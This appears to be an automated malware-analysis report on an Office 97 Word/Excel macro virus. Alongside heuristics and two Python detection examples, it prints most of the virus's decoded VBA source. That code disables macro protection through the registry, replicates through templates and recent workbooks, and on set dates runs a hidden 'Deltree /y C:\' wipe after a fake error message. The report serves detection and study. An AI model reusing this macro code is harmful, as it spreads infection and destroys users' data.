Verdict: MALICIOUS
Risk Score: 520

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

Malware Insights
The sample is an OLE/CFB Office document whose VBA project (module ThisWorkbook, marker comments 'Snack <->>- Poison <->>- Cobra' and 'Macros By Liton') is a Word/Excel cross-infecting macro virus written for Office 97: every registry path it touches sits under ...\Software\Microsoft\Office\8.0\. Which entry point fires depends on the host. Document_Open is Word's open event; it copies the virus body between the NormalTemplate and ActiveDocument code modules, using the marker on line 1 to tell infected modules from clean ones, sets Options.VirusProtection and Options.SaveNormalPrompt to False, and uses System.PrivateProfileString to write EnableMacroVirusProtection=0 under HKEY_USERS\.Default\...\Word\Options and to blank the Excel 'Options6' values under HKCU, HKLM and HKEY_USERS\.Default. It then instantiates Excel with CreateObject("Excel.Application"), opens each workbook named in Excel's Recent File List (File1 to File4) with GetObject, replaces its first code module with the virus body and saves it, and drops or re-infects Book1. in Excel's StartupPath so the code loads on every Excel start. WorkBook_Deactivate is the Excel side of the same loop: it copies code between ActiveWorkbook and ThisWorkbook and instantiates Word with CreateObject("Word.Application") to reach the Normal template (the preview is cut off inside this routine). The single Shell() call is a destructive payload, not a downloader: on 21 February, 26 March, 1 May, 15 August or 16 December the macro shows a fake 'Data error reading drive C' message box and runs Shell "Deltree /y C:\", vbHide. Nothing in the carved source downloads or executes additional code; the CreateObject/GetObject calls serve cross-application infection. ClamAV names the top-level file Doc.Trojan.Snack-2 and the extracted module Win.Trojan.C-286. The second carved artifact, a 34,136-byte CFB body at offset 0x60A8 with no readable directory, was not detected by ClamAV; its 'obfuscation likely' verdict rests on the macro source, not on anything recovered from that body.
Heuristics 11
- ClamAV: Doc.Trojan.Snack-2 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Snack-2.
- Embedded Office document has suspicious static findings (critical; EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE): A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
- VBA macros detected (medium; OLE_VBA_MACROS; 5 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical; OLE_VBA_SHELL): Shell() call in VBA. In this sample it is Shell "Deltree /y C:\", vbHide, a destructive payload rather than a download-and-execute step.
- Document_Open macro (high; OLE_VBA_DOCOPEN): Document_Open macro, Word's auto-run event on document open.
- CreateObject call (high; OLE_VBA_CREATEOBJ): CreateObject call; here CreateObject("Excel.Application") and CreateObject("Word.Application"), used for cross-application infection.
- GetObject call (high; OLE_VBA_GETOBJ): GetObject call, used to open workbooks from Excel's Recent File List and the dropped Book1. file.
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- OLE document has large unaccounted-for region (high; OLE_SLACK_ANOMALY): OLE file is 34,136 bytes but its declared streams total only 0 bytes; 34,136 bytes (100%) live in unallocated sector slack. The 34,136-byte figure is the carved child at offset 0x60A8 (see the extracted artifacts), not the top-level file. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Suspicious extracted artifact (high; EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- CFB header with no readable streams (medium; OLE_PARSE_EMPTY_STREAMS): The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous: it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
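The two OLE structure heuristics above, OLE_SLACK_ANOMALY and OLE_PARSE_EMPTY_STREAMS, reduce to one measurement: how many bytes of the compound file are reachable through its FAT and directory. The block below is an added example of that measurement over the raw CFB layout with only the standard library; it is not the analyzer's code. It fabricates a small version-3 compound file as constructed test data (the stream name 'Macros', the 4096-byte and 25% slack thresholds are this example's own assumptions) so it can show the clean case, the appended-slack case and the no-directory case the heuristics describe.

```python
"""How much of an OLE2/CFB file is reachable from its directory: the measurement
behind the OLE_SLACK_ANOMALY and OLE_PARSE_EMPTY_STREAMS heuristics above.
Added example, standard library only; not the analyzer's code.  build_cfb()
fabricates a tiny version-3 compound file as constructed test data."""
import struct

MAGIC = b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1'
ENDOFCHAIN, FATSECT, FREESECT, NOSTREAM = 0xFFFFFFFE, 0xFFFFFFFD, 0xFFFFFFFF, 0xFFFFFFFF
SS = 512                                        # sector size for major version 3


def _dir_entry(name: str, etype: int, child: int, start: int, size: int) -> bytes:
    e = bytearray(128)
    n = name.encode('utf-16-le')
    e[:len(n)] = n
    struct.pack_into('<HBB', e, 64, len(n) + 2, etype, 1)      # name length incl. NUL, type, colour
    struct.pack_into('<3I', e, 68, NOSTREAM, NOSTREAM, child)   # left, right, child
    struct.pack_into('<IQ', e, 116, start, size)                # start sector, stream size
    return bytes(e)


def build_cfb(stream_data: bytes, empty_directory: bool = False) -> bytes:
    """Constructed sample: header, one FAT sector, one directory sector, then the stream.
    empty_directory=True writes a directory sector with no entries (the 'no readable streams' case)."""
    nsec = -(-len(stream_data) // SS)                           # sectors 2 .. nsec+1 hold the stream
    header = bytearray(SS)
    header[:8] = MAGIC
    struct.pack_into('<5H', header, 24, 0x3E, 3, 0xFFFE, 9, 6)  # minor, major, byte order, sector shift, mini shift
    # dir sector count (0 in v3), FAT sector count, first dir sector, txn signature,
    # mini stream cutoff, first mini FAT, mini FAT count, first DIFAT, DIFAT count
    struct.pack_into('<9I', header, 40, 0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into('<109I', header, 76, 0, *([FREESECT] * 108))  # in-header DIFAT: FAT lives in sector 0
    chain = [FATSECT, ENDOFCHAIN] + list(range(3, 2 + nsec)) + [ENDOFCHAIN]
    fat = struct.pack(f'<{SS // 4}I', *chain, *([FREESECT] * (SS // 4 - len(chain))))
    if empty_directory:
        directory = bytes(SS)
    else:
        directory = (_dir_entry('Root Entry', 5, 1, ENDOFCHAIN, 0)
                     + _dir_entry('Macros', 2, NOSTREAM, 2, len(stream_data))).ljust(SS, b'\0')
    return bytes(header) + fat + directory + stream_data.ljust(nsec * SS, b'\0')


def cfb_slack_report(data: bytes) -> dict:
    """Sum the sectors reachable through FAT and directory and compare with the file size."""
    if data[:8] != MAGIC:
        raise ValueError('not an OLE2/CFB file')
    major, _, shift = struct.unpack_from('<HHH', data, 26)
    ss = 1 << shift
    num_fat, first_dir = struct.unpack_from('<II', data, 44)
    cutoff, = struct.unpack_from('<I', data, 56)
    sector = lambda n: data[ss * (n + 1): ss * (n + 2)]
    # Assumption: the FAT sector list fits the 109 in-header DIFAT slots (files under ~7 MB).
    fat_sectors = [s for s in struct.unpack_from('<109I', data, 76)[:num_fat]
                   if s != FREESECT and len(sector(s)) == ss]
    fat = [e for s in fat_sectors for e in struct.unpack(f'<{ss // 4}I', sector(s))]
    dir_sectors, s = [], first_dir
    while s < len(fat) and s not in dir_sectors and len(sector(s)) == ss:  # ENDOFCHAIN, loops, truncation end the walk
        dir_sectors.append(s)
        s = fat[s]
    streams, root_size = [], 0
    for d in dir_sectors:
        blob = sector(d)
        for off in range(0, ss, 128):
            name_len, etype = struct.unpack_from('<HB', blob, off + 64)
            if etype not in (1, 2, 5):               # 0 = unused slot, 1 = storage, 2 = stream, 5 = root
                continue
            name = blob[off:off + min(max(name_len - 2, 0), 64)].decode('utf-16-le', 'replace')
            start, lo, hi = struct.unpack_from('<III', blob, off + 116)
            size = lo if major == 3 else lo | (hi << 32)     # v3: the high dword is unspecified
            if etype == 2:
                streams.append((name, start, size))
            elif etype == 5:
                root_size = size                       # mini stream holding streams below the cutoff
    declared = sum(sz for _, _, sz in streams)
    stream_sectors = sum(-(-sz // ss) * ss for _, _, sz in streams if sz >= cutoff) + -(-root_size // ss) * ss
    structural = ss * (1 + len(fat_sectors) + len(dir_sectors))
    unaccounted = len(data) - structural - stream_sectors    # negative: declared sizes exceed the file (truncation)
    findings = []
    if not streams:
        findings.append('OLE_PARSE_EMPTY_STREAMS')
    if unaccounted >= 4096 or unaccounted > 0.25 * len(data):   # thresholds are this example's assumption
        findings.append('OLE_SLACK_ANOMALY')
    return {'file_size': len(data), 'stream_count': len(streams), 'streams': [n for n, _, _ in streams],
            'declared_stream_bytes': declared, 'unaccounted_bytes': unaccounted,
            'slack_pct': round(100 * unaccounted / len(data), 1), 'findings': findings}


if __name__ == '__main__':
    print(cfb_slack_report(build_cfb(b'A' * 5000)))                           # clean layout
    print(cfb_slack_report(build_cfb(b'A' * 5000) + b'\x90' * 8192))          # 8 KiB appended past the last sector
    print(cfb_slack_report(build_cfb(b'A' * 5000, empty_directory=True)))     # directory with no entries
```

For a real sample call cfb_slack_report(open(path, 'rb').read()). The check reads only the 109 in-header DIFAT slots, which is enough for files below roughly 7 MB; a negative unaccounted count means declared sizes exceed the file, that is, truncation, which is also worth flagging.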
Extracted artifacts 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18285 bytes |

SHA-256: aa425e75004439e08d756574cb24a80f8c4b7eb7ce1c6bdfc214fbdab1f6878e
Detection: ClamAV Win.Trojan.C-286; obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Snack <->>- Poison <->>- Cobra
'Macros By Liton
Private Sub Document_Open()
On Error Resume Next
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set Xla = CreateObject("Excel.Application")
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
IString = NT.Lines(1, 1)
DString = "'Snack <->>- Poison <->>- Cobra"
If IString <> DString Then
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
End If
IString = AD.Lines(1, 1)
If IString <> DString Then
AD.DeleteLines 1, AD.CountOfLines
AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
End If
With Options
.VirusProtection = False: .SaveNormalPrompt = False
End With
If System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") <> "0" Then
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = "0"
End If
If Xla.Name = "Microsoft Excel" Then
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") <> "" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
End If
For i = 1 To 4
GetName = "File" + Trim(Str(i))
FilName = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Recent File List", GetName)
If FilName <> "" Then
Set GO = GetObject(FilName)
If GO.VBProject.VBComponents(1).CodeModule.CountOfLines > 0 Then
GO.VBProject.VBComponents(1).CodeModule.DeleteLines 1, GO.VBProject.VBComponents(1).CodeModule.CountOfLines
End If
GO.VBProject.VBComponents(1).CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
GO.Save
End If
Next
StartPath = Xla.Application.StartupPath
If UCase(Dir(StartPath + "\Book1.")) <> "BOOK1" Then
Set WrkBook = Xla.Workbooks.Add
WrkBook.VBProject.VBComponents(1).CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
WrkBook.SaveAs StartPath & "\Book1."
WrkBook.Save
WrkBook.Close
Else
Set WrkBook = GetObject(StartPath + "\Book1.")
If WrkBook.VBProject.VBComponents(1).CodeModule.CountOfLines > 0 Then
WrkBook.VBProject.VBComponents(1).CodeModule.DeleteLines 1, WrkBook.VBProject.VBComponents(1).CodeModule.CountOfLines
End If
WrkBook.VBProject.VBComponents(1).CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
WrkBook.Save
Xla.Quit
End If
End If
If (Month(Now) = 2 And Day(Now) = 21) Or (Month(Now) = 3 And Day(Now) = 26) Or (Month(Now) = 5 And Day(Now) = 1) Or (Month(Now) = 8 And Day(Now) = 15) Or (Month(Now) = 12 And Day(Now) = 16) Then
MsgBox "Data error reading drive C" + Chr(13) + "Press OK to Correct this problem.", vbOKOnly + vbCritical, "Cobra"
Shell "Deltree /y C:\", vbHide
End If
End Sub
Private Sub WorkBook_Deactivate()
On Error Resume Next
Set AW = ActiveWorkbook.VBProject.VBComponents(1).CodeModule
Set TW = ThisWorkbook.VBProject.VBComponents(1).CodeModule
IString = AW.Lines(1, 1)
DString = "'Snack <->>- Poison <->>- Cobra"
If IString <> DString Then
AW.DeleteLines 1, AW.CountOfLines
AW.InsertLines 1, TW.Lines(1, TW.CountOfLines)
End If
IString = TW.Lines(1, 1)
If IString <> DString Then
TW.DeleteLines 1, TW.CountOfLines
TW.InsertLines 1, AW.Lines(1, AW.CountOfLines)
End If
Set WOBJ = CreateObject("Word.Application")
If WOBJ.Name = "Microsoft Word" Then
Set NT = WOBJ.NormalTemplate
MS = NT.Path
If NT.VBProject.VBComponents(1).CodeModule.CountOfLines > 0 Then
NT.VBProject.VBComponents(1).CodeMo
... (truncated)

| Filename | Kind | Source | Size |
|---|---|---|---|
| embedded_office_off000060a8.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x60A8 | 34136 bytes |

SHA-256: 63ce6f32b89c9ebbfe1a568f556561b964112d6afde6f2e5921e2daba3c91ef5
Detection: ClamAV no threats found; obfuscation or payload: likely (carved macro source contains an auto-exec entry point and execution/download terms)
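The OLE_VBA_PCODE_AUTOEXEC_EXEC logic, an auto-exec entry point combined with execution tokens, is straightforward to reproduce over decoded source such as the macros.bas preview above. The block below is an added example and is neither the analyzer's nor the virus author's code. SAMPLE_VBA is a constructed excerpt of the preview; the token lists, the date-trigger pattern and the severity ladder are this example's own choices, and the two download primitives (URLDownloadToFile, XMLHTTP) are included to show the general check even though this sample uses neither.

```python
"""Static triage of decoded VBA source: auto-exec entry points plus execution,
download and security-tampering tokens.  Added example, standard library only;
not the analyzer's code.  SAMPLE_VBA is a constructed excerpt of macros.bas."""
import re

# Constructed excerpt of the macro preview shown on this page (abridged).
SAMPLE_VBA = r'''
'Snack <->>- Poison <->>- Cobra
'Macros By Liton
Private Sub Document_Open()
On Error Resume Next
Set Xla = CreateObject("Excel.Application")
With Options
.VirusProtection = False: .SaveNormalPrompt = False
End With
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = "0"
Set GO = GetObject(FilName)
If (Month(Now) = 2 And Day(Now) = 21) Or (Month(Now) = 12 And Day(Now) = 16) Then
MsgBox "Data error reading drive C", vbOKOnly + vbCritical, "Cobra"
Shell "Deltree /y C:\", vbHide
End If
End Sub
Private Sub WorkBook_Deactivate()
Set WOBJ = CreateObject("Word.Application")
End Sub
'''

# Procedures Word/Excel run without a click (VBA identifiers are case-insensitive).
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Sub\s+'
    r'(Auto(?:Open|Exec|Close|New|Exit)|Auto_(?:Open|Close)|Document_(?:Open|Close|New)|'
    r'Workbook_(?:Open|Activate|Deactivate|BeforeClose))\s*\(', re.I | re.M)

EXEC_TOKENS = {                         # execution / object-instantiation primitives
    'Shell': re.compile(r'(?<![.\w])Shell\b', re.I),              # not WScript.Shell, not ShellExecute
    'CreateObject': re.compile(r'\bCreateObject\s*\(', re.I),
    'GetObject': re.compile(r'\bGetObject\s*\(', re.I),
    'URLDownloadToFile': re.compile(r'\bURLDownloadToFile', re.I),  # download primitives: absent from
    'XMLHTTP': re.compile(r'XMLHTTP', re.I),                         # this sample, kept for generality
}
TAMPER_TOKENS = {                       # macro-security tampering seen in the sample
    'VirusProtection=False': re.compile(r'\.VirusProtection\s*=\s*False', re.I),
    'EnableMacroVirusProtection': re.compile(r'EnableMacroVirusProtection', re.I),
    'PrivateProfileString': re.compile(r'\bPrivateProfileString\b', re.I),
}
SHELL_CMD_RE = re.compile(r'(?<![.\w])Shell\s*\(?\s*"([^"\n]*)"', re.I)          # literal command strings
PROGID_RE = re.compile(r'\b(?:Create|Get)Object\s*\(\s*"([^"\n]+)"', re.I)        # COM ProgIDs instantiated
REGKEY_RE = re.compile(r'"((?:HKEY_[A-Z_]+|HK(?:LM|CU|U|CR))\\[^"\n]+)"', re.I)   # registry paths touched
DATE_RE = re.compile(r'Month\(Now\)\s*=\s*(\d{1,2})\s+And\s+Day\(Now\)\s*=\s*(\d{1,2})', re.I)


def triage(src: str) -> dict:
    """Return OLE_VBA_*-style findings and a severity for one module's source."""
    autoexec = AUTOEXEC_RE.findall(src)
    exec_hits = [name for name, rx in EXEC_TOKENS.items() if rx.search(src)]
    tamper = [name for name, rx in TAMPER_TOKENS.items() if rx.search(src)]
    if autoexec and 'Shell' in exec_hits:
        severity = 'critical'           # runs on open and spawns a process (cf. OLE_VBA_SHELL)
    elif autoexec and (exec_hits or tamper):
        severity = 'high'               # runs on open and instantiates objects or disables protection
    elif autoexec or exec_hits:
        severity = 'medium'
    else:
        severity = 'low'
    return {
        'autoexec': autoexec,
        'exec_tokens': exec_hits,
        'tamper': tamper,
        'shell_commands': SHELL_CMD_RE.findall(src),
        'progids': PROGID_RE.findall(src),
        'registry_keys': sorted(set(REGKEY_RE.findall(src))),
        'date_triggers': [(int(m), int(d)) for m, d in DATE_RE.findall(src)],
        'severity': severity,
    }


if __name__ == '__main__':
    for key, value in triage(SAMPLE_VBA).items():
        print(f'{key:15} {value}')
```

Run over the excerpt, the result names both entry points (Document_Open for Word, WorkBook_Deactivate for Excel), the Deltree command behind the only Shell call, the two Office ProgIDs and the Office 8.0 registry path, which is the evidence the summary above relies on; source-level matching like this is complementary to the p-code token check, which is what remains when olevba cannot decompress the source.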